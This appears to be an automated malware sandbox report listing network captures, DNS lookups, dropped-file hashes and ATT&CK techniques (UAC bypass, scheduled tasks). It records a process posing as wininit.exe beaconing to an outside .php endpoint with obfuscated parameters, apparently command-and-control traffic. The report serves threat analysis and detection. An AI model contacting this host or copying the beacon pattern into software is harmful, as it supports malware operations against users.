GEThttp://a0991016.xsph.ru/71a7beea.php?1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju&9bc5a1f6a836361158b9ca3d39d8a61c=547e80fe3c865e9d7b2aa4cf22753fb7&32e5f15105f51c8e47fbee710b2f7fd1=QOhJDMjRWY1Y2NmNTM1QzM5UGZ3IjNxczY1ETY0UTN0QWM3YGM4cTN&1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGjuwininit.exeRemote address:141.8.192.58:80RequestGET /71a7beea.php?1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju&9bc5a1f6a836361158b9ca3d39d8a61c=547e80fe3c865e9d7b2aa4cf22753fb7&32e5f15105f51c8e47fbee710b2f7fd1=QOhJDMjRWY1Y2NmNTM1QzM5UGZ3IjNxczY1ETY0UTN0QWM3YGM4cTN&1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: a0991016.xsph.ru
ResponseHTTP/1.1 403 Forbidden
Date: Sat, 15 Jun 2024 11:00:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.187.196
-
Remote address:142.250.187.196:443RequestGET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.196:443RequestGET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.196:443RequestGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CPCPywE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestapis.google.comIN AResponseapis.google.comIN CNAMEplus.l.google.complus.l.google.comIN A142.250.200.14
-
GEThttps://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.JHoMBbBABZg.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAQ/rs=AHpOoo_6Zf8M75AJqSyaaLg_vD7Vr9kevQ/cb=gapi.loaded_0chrome.exeRemote address:142.250.200.14:443RequestGET /_/scs/abc-static/_/js/k=gapi.gapi.en.JHoMBbBABZg.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAQ/rs=AHpOoo_6Zf8M75AJqSyaaLg_vD7Vr9kevQ/cb=gapi.loaded_0 HTTP/2.0
host: apis.google.com
sec-ch-ua: "Chromium";v="106", "Google Chrome";v="106", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.250.179.238
-
Remote address:142.250.179.238:443RequestPOST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
content-length: 938
sec-ch-ua: "Chromium";v="106", "Google Chrome";v="106", "Not;A=Brand";v="99"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
content-type: application/x-www-form-urlencoded;charset=UTF-8
accept: */*
origin: chrome-untrusted://new-tab-page
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
141.8.192.58:80http://a0991016.xsph.ru/71a7beea.php?1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju&9bc5a1f6a836361158b9ca3d39d8a61c=547e80fe3c865e9d7b2aa4cf22753fb7&32e5f15105f51c8e47fbee710b2f7fd1=QOhJDMjRWY1Y2NmNTM1QzM5UGZ3IjNxczY1ETY0UTN0QWM3YGM4cTN&1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGjuhttpwininit.exe3.2kB 118.5kB 47 88
HTTP Request
GET http://a0991016.xsph.ru/71a7beea.php?1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju&9bc5a1f6a836361158b9ca3d39d8a61c=547e80fe3c865e9d7b2aa4cf22753fb7&32e5f15105f51c8e47fbee710b2f7fd1=QOhJDMjRWY1Y2NmNTM1QzM5UGZ3IjNxczY1ETY0UTN0QWM3YGM4cTN&1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGjuHTTP Response
403HTTP Request
GET http://a0991016.xsph.ru/71a7beea.php?1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGju&9bc5a1f6a836361158b9ca3d39d8a61c=547e80fe3c865e9d7b2aa4cf22753fb7&32e5f15105f51c8e47fbee710b2f7fd1=QOhJDMjRWY1Y2NmNTM1QzM5UGZ3IjNxczY1ETY0UTN0QWM3YGM4cTN&1nj4yA2AxXPcVFluw=38Vp9XQBJe3bvToS2oeQkAOGjuHTTP Response
403 -
142.250.187.196:443https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0tls, http2chrome.exe2.6kB 44.8kB 31 46
HTTP Request
GET https://www.google.com/async/ddljson?async=ntp:2HTTP Request
GET https://www.google.com/async/newtab_promosHTTP Request
GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 -
142.250.200.14:443https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.JHoMBbBABZg.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAQ/rs=AHpOoo_6Zf8M75AJqSyaaLg_vD7Vr9kevQ/cb=gapi.loaded_0tls, http2chrome.exe2.4kB 50.3kB 26 42
HTTP Request
GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.JHoMBbBABZg.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAQ/rs=AHpOoo_6Zf8M75AJqSyaaLg_vD7Vr9kevQ/cb=gapi.loaded_0 -
2.8kB 9.2kB 15 17
HTTP Request
POST https://play.google.com/log?format=json&hasfast=true
-
62 B 78 B 1 1
DNS Request
a0991016.xsph.ru
DNS Response
141.8.192.58
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.187.196
-
61 B 98 B 1 1
DNS Request
apis.google.com
DNS Response
142.250.200.14
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.179.238
-
204 B 3
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD5aefd77f47fb84fae5ea194496b44c67a
SHA1dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA2564166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
Filesize16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
239B
MD5cb8906e048291ac11993ece3ed24392f
SHA152f225c156346a86db0afc13281532ab270e4e1a
SHA256ecfe3a7734d7faae0a8e70b65256b8e5fabc554a918f7485502497046657bebf
SHA512045996bce69fd9cdf192606381201f65f0b7a6bd1c62586fe33d20314a33620b2443a8a31d0ebc8c607c23b8e917e29b1a4f9d0df0e350b558f0e53a44291cf7
-
Filesize
154B
MD58f6eddc9e68bb024acc01c2a7c37dad9
SHA1c9ae400b119f35f83f300cff443d93264b4bb690
SHA256d95e79a6458989d2ab852e27afd0b2f59150e3fc84d088d8cbb7ab5830ff7e92
SHA5127b3db4ffb023c50e0357387b71031c68e5dfa50dfbbb21c71722678f00a87cbd8ecaa2713eb888fd480caa2b8cf9d86732ecc24a0c477e5705dd2ea90f236a4b
-
Filesize
217B
MD55319b8577089dc9ecb3447b40ba0cc74
SHA17d1ac12cd64ac34823d1241398a280d508a58f3d
SHA256773dda731c426cb77049507f2510feb8089ceff036855cc3c45a20a6bb4d14e1
SHA51243abcd455730491a9ea9d4669d00eb881b5a3d4378d60baa2eb4b997ce12e7df9c18bc22835cb34846b5b80d8e892cbdda884188ff97a88a3b3536c8b5cbd205
-
Filesize
1.3MB
MD57c4388597e78e4d04ab3e4ec7f807b28
SHA1b11da9555e2e46c8208f0f29d46fb77c98854304
SHA25618ce4b699fa9cb509c3332d5303fe146551938c502f1c32158efaa04121d54af
SHA51273fedc015eb64426664b673e16b01d8a6d29c8b5e71439fb2d88f0876ea52d4a59e6e54145cc6e070ebc6dcfa0b400dfb07d8ade9d40a9351b5cdcf6dcfc9451